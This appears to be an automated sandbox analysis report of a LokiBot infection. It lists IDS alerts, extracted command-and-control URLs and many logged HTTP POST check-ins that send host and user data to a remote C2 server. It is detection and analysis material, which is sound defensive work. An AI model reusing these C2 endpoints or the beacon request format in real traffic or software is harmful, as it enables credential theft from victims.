                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50029 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50029 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50029 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50033 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50033 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50033 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50029 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50034
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50029 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50029
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50033 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50033 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49907 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50047
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50040 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50045 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50040 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49907 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50040 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50032 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50045 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50026 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50026 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50026 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50045 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50033
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50026 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50026 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50045 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50040 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49907
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50045 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50032
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50040 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50026
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50045
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:50040
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49987 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49987 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49987 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49987 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49987 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49987
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49845
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49826
                      Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                      Source: Malware configuration extractorURLs: https://dddotx.shop/Mine/PWS/fre.php
                      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 180Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 180Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 153Connection: close
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
                      Source: global trafficDNS traffic detected: DNS query: dddotx.shop
                      Source: unknownHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 180Connection: close
